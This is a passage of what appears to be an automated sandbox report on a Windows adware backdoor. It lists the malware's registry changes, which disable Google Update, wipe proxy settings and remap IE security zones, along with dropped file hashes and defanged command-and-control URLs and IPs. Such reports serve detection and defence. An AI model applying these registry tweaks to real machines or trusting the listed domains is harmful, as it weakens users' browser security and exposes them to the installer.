[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:188 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"InstallDate" = "20150509"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"DisplayIcon" = "%System%\msiexec.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"UninstallString" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"DisplayName" = "BrrOwsiNGclEarly"

"ProductName" = "BrrOwsiNGclEarly"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 F2 FF CC 16 67 EB 1A 69 B1 07 24 17 C6 05 E8"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"SilentUninstall" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoRepair" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1016 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"ProductName" = "Chime"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"NoModify" = "1"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"UninstallString" = "%Program Files%\Chime\Chime.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"InstallDate" = "20150509"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"CategoryName" = "Apps"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"NoRepair" = "1"

"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 4B B3 27 69 E7 96 8C 9C 2F D3 6F 20 3D 01 25"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"SilentUninstall" = "%Program Files%\Chime\Chime.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"DisplayName" = "Chime"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process rundll32.exe:1432 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a1dcff5b" = "V/////%%"
"0dc3ee96" = "/P////%%"
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"a2e3b941" = "///%"
"6185d035" = "Vx/2/Cx/V//l////"
"d1abcdb6" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f0bf0bde" = "///%"
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"c6c5dd44" = "V/////%%"
"587b5709" = "V/////%%"
"7367429f" = "///%"
"27ddcf6f" = "///%"
"48bd1aff" = "V/////%%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"e8f9dcc7" = "UlAr/XJ/c//k////"
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"fe94ce1e" = "V/////%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
"7f69fa1f" = "///%"
"f2c53c49" = "UlAr/XJ/c//k////"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"370856c7" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2e22d94e" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"3efeb33e" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"c5705860" = "Vx////%%"
"8b9e4cbc" = "V/////%%"
"c99a5f5c" = "///%"
"3c09c42b" = "///%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 A6 62 68 D8 F2 D2 66 8E 39 88 BD C0 BD DF 21"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"
"0e93c3f3" = "///%"
"65114b36" = "Vl/l////"
"e46c271e" = "///%"
"0c230bcb" = "///%"
"72758a5d" = "///%"
"bbf88800" = "///%"
"a0743acc" = "N/////%%"
"2d71d5ab" = "V/////%%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"f6ad6fa6" = "V/////%%"
"340d3099" = "/P////%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"iiid" = "1"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1520c6f1" = "V/////%%"
"414bc593" = "///%"

The process rundll32.exe:1196 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C B3 A7 58 2D 80 17 B5 4A FC 58 61 A2 3F 52 45"

Dropped PE files

MD5 File path
79f9311ac6a5009fef1a5756a0a529d3 c:\Program Files\ActiveCoupon\ActiveCoupon.exe
d6afed6a20c3343acb878ffa399f538b c:\Program Files\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll
9f6c52eec607111136cd222b02bf0530 c:\Program Files\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe
9f6c52eec607111136cd222b02bf0530 c:\Program Files\Chime\Chime.exe
4277381dbc9bf652805dad7fc0527793 c:\Program Files\WWhiteCouPooni\7qwHG4CXj1mdR3.dll
9f6c52eec607111136cd222b02bf0530 c:\Program Files\WWhiteCouPooni\7qwHG4CXj1mdR3.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 289472 289792 5.22326 0b29ab3ccbc000e05e55a97d0cfb232d
.rdata 294912 18878 18944 3.30236 729772da64321bbeffad66bb1b3e1d38
.data 315392 142804 132096 2.08665 2ccbe851032a092ba4bbf57df05bb72d
.rsrc 458752 16120 16384 4.22721 699f51992a29975ccec7d79727813e0b
.reloc 475136 6784 7168 3.47446 fd43122d257222321aa1ceb2a0ee72a3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://linq-goody-best.xyz/hp/?q=XDOtvcE+9jE/sqMztvXFjnV0Q9S5QAWSoMFJVLK2BupEE8V7TCpqJoGq/iUeUKvbvmDwEpIGujfPRivaynoO9il//gnTI+akMQhfaElhTWusj5ht3kdqYS0gcmr8lJRjyYajy0WmpJYzt8V1hGGJd6bu1v1Wjq6fQOF0vAXOLe0aIPkSZPKdnETmEH0PtwjHTGUMXNiBdiO7KPOOSY8c/Dvf5mTLc05Yr1a5uwXIQgSoV30s915myZ8+GZD2/5iQxW6ZCDtTnWb5vPL/R0cB3VtBtXt++aiHLFtYt9rxpIMJS30soMfKTAbZNbyO4WGAc4gMuLVlHX4yIkVjv+6VAlvUM 54.68.13.248
hxxp://r1.mytholiday.com/ 54.69.32.99
hxxp://goldavid.com/?e=whcop&sfx=2&cht=0&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 54.68.254.5
hxxp://r1.mytholiday.com/?step_id=2&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 54.69.32.99
hxxp://goldavid.com/?e=wxd&dd=20&ams=6&emnum=38&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 54.68.254.5
hxxp://r1.mytholiday.com/?step_id=3&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 54.69.32.99
hxxp://goldavid.com/?e=dnkp&dd=23&emnum=53&jc=1&sfx=2&ams=6&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&cha=0 54.68.254.5
hxxp://r1.mytholiday.com/?step_id=4&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 54.69.32.99
hxxp://storestral.com/?e=nnnbvv&publisher=&&dd=3&ind=5459321632979031863&exid=%UpdateInfo_ExternalID&bijo=1&ssd=7757455632247121954&hid=12802899647634509424&osid=501&sfx=2&jc=1&cha=0 54.149.75.132
hxxp://r1.mytholiday.com/?step_id=5&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 54.69.32.99
hxxp://storestral.com/?e=ressal&sfx=2&cht=0&dd=5&cid=599&vn=159&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 54.149.75.132
hxxp://r1.mytholiday.com/?step_id=6&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 54.69.32.99
hxxp://c1.storesis.com/?step_id=5&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 54.69.32.99
